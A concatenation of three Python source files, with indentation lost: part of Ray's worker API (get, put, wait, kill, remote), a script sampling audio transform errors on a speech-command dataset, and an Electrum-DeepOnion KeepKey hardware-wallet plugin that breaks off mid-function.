# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and len(
job_config.get_runtime_env_uris()) == 0:
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
if _internal_kv_get(
"tracing_startup_hook",
namespace=ray_constants.KV_NAMESPACE_TRACING):
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
_internal_kv_get(
"tracing_startup_hook",
namespace=ray_constants.KV_NAMESPACE_TRACING).decode(
"utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple message under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
data_type (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
placement_group="default",
worker=None,
retry_exceptions=None,
concurrency_groups=None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env, placement_group)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(
function_or_class, num_cpus, num_gpus, memory,
object_store_memory, resources, accelerator_type, max_restarts,
max_task_retries, runtime_env, concurrency_groups)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2, max_calls=None)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4 (default), and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns",
"num_cpus",
"num_gpus",
"memory",
"object_store_memory",
"resources",
"accelerator_type",
"max_calls",
"max_restarts",
"max_task_retries",
"max_retries",
"runtime_env",
"retry_exceptions",
"placement_group",
"concurrency_groups",
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
placement_group = kwargs.get("placement_group", "default")
retry_exceptions = kwargs.get("retry_exceptions")
concurrency_groups = kwargs.get("concurrency_groups")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
placement_group=placement_group,
worker=worker,
retry_exceptions=retry_exceptions,
concurrency_groups=concurrency_groups or [])
|
sample_error.py
|
import sys
import numpy as np
import random
import argparse
from operator import itemgetter
import multiprocessing as mp
from tqdm import tqdm
import os
import librosa
from transforms import scale_volume, shift
sys.path.append('..')
from util import str2bool, split, lmap # noqa: E402
sys.path.append('./GCommandsPytorch')
from gcommand_loader import find_classes, make_dataset # noqa: E402
def get_dataset():
"""
Returns
-------
a dataset which is a list of tuples (path, label)
"""
path = "./GCommandsPytorch/data/train"
classes, class_to_idx = find_classes(path)
data = make_dataset(path, class_to_idx)
return data
def spect_tranform(y, sr, window_size=.02, window_stride=.01, window='hamming', max_len=101):
n_fft = int(sr * window_size)
win_length = n_fft
hop_length = int(sr * window_stride)
# STFT
D = librosa.stft(y, n_fft=n_fft, hop_length=hop_length,
win_length=win_length, window=window)
spect, phase = librosa.magphase(D)
spect_log = np.log1p(spect)
return spect, spect_log
def transform(y, sr, a, b, args):
"""
Parameters
----------
y : actually sampled data
sr : sample
a : attacker parameter
b : smoothing parameter
args : args struct
Returns
-------
difference between interpolated and non-interpolated data
"""
t = {'volume': scale_volume,
'pitch_shift': shift}[args.trafo]
y_a, _ = t(y, sr, a)
y_a_b, _ = t(y_a, sr, b)
y_ab, _ = t(y, sr, a + b)
#assert np.all(y_a_b < 32768)
#assert np.all(y_ab < 32768)
#y_ab /= 32768
#y_a_b /= 32768
diff = y_a_b - y_ab
s_y_a_b, l_s_y_a_b = spect_tranform(y_a_b, sr)
s_y_ab, l_s_y_ab = spect_tranform(y_ab, sr)
spect_diff = s_y_a_b - l_s_y_a_b
log_spect_diff = s_y_ab - l_s_y_ab
return diff, spect_diff, log_spect_diff
def run(k, args, xs, conn):
"""
Parameters
----------
k : index of thread
args : struct of all arguments
xs: list of ids (int) of data points
conn : pipe to the main thread
function is run as a thread
iterates though all x in xs and samples errors
and reports them back to the main thread
"""
np.random.seed(1000 * args.seed + k)
data = lmap(itemgetter(0), get_dataset())
a_min = -args.alpha_min_max
a_max = args.alpha_min_max
for i in xs:
path = data[i]
y, sr = librosa.load(path, sr=None)
for _ in range(args.K):
a = np.random.uniform(a_min, a_max)
b = np.random.normal(0, args.beta_std)
diff, spect_diff, l_spect_diff = transform(y, sr, a, b, args)
l1 = np.linalg.norm(diff, ord=1)
l2 = np.linalg.norm(diff, ord=2)
linf = np.linalg.norm(diff, ord=np.inf)
ret = [i, a, b, l1, l2, linf]
s_l1 = np.linalg.norm(np.ravel(spect_diff), ord=1)
s_l2 = np.linalg.norm(np.ravel(spect_diff), ord=2)
s_linf = np.linalg.norm(np.ravel(spect_diff), ord=np.inf)
l_s_l1 = np.linalg.norm(np.ravel(l_spect_diff), ord=1)
l_s_l2 = np.linalg.norm(np.ravel(l_spect_diff), ord=2)
l_s_linf = np.linalg.norm(np.ravel(l_spect_diff), ord=np.inf)
ret.extend([s_l1, s_l2, s_linf, l_s_l1, l_s_l2, l_s_linf])
conn.send(ret)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-N', type=int, default=51088,
help='number of images from the training data')
parser.add_argument('-K', type=int, default='100', help='number of angle samples per image')
parser.add_argument('--seed', type=int, default='0', help='seed')
parser.add_argument('--trafo', choices=['pitch_shift', 'volume'],
default='volume', help='transformation')
parser.add_argument('--alpha_min_max', type=float, default='1.2',
help='attacker parameter between 1/x and x')
parser.add_argument('--beta_std', type=float, default='0.3', help='standard deviation for beta')
parser.add_argument('-p', type=int, default=16, help='processors')
parser.add_argument('--write', type=str2bool, default=True, help='write to file')
args = parser.parse_args()
np.random.seed(args.seed)
random.seed(args.seed)
data = get_dataset()
L = len(data)
N = min(L, args.N)
I = list(range(L))
samples = list(random.sample(I, N))
sample_chunks = list(split(samples, args.p))
pipes = [mp.Pipe() for i in range(args.p)]
ps = [mp.Process(target=run, args=(i, args, sample_chunks[i], pipes[i][1]))
for i in range(args.p)]
recievers = [p for p, _ in pipes]
for p in ps:
p.start()
os.makedirs("sampling", exist_ok=True)
fn = f"{args.trafo}_{N}_{args.K}_{args.alpha_min_max}_{args.beta_std}_{args.seed}.csv"
fn = os.path.join('sampling', fn)
f = open(fn, "w") if args.write else sys.stdout
R = 0
M = N * args.K
with tqdm(total=M) as pbar:
while R < M:
results = mp.connection.wait(recievers, timeout=1)
for r in results:
res_tuple = r.recv()
print(", ".join(map(str, res_tuple)), file=f)
R += 1
pbar.update(1)
f.flush()
for r in recievers:
r.close()
for p in ps:
p.join()
if args.write:
f.close()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_deeponion.util import bfh, bh2u, UserCancelled
from electrum_deeponion.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT,
is_segwit_address)
from electrum_deeponion import constants
from electrum_deeponion.i18n import _
from electrum_deeponion.plugins import BasePlugin
from electrum_deeponion.transaction import deserialize, Transaction
from electrum_deeponion.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_deeponion.wallet import Standard_Wallet
from electrum_deeponion.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def is_segwit(self):
return self.derivation.startswith("m/49'/")
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "DeepOnion"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
traceback.print_exc(file=sys.stderr)
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
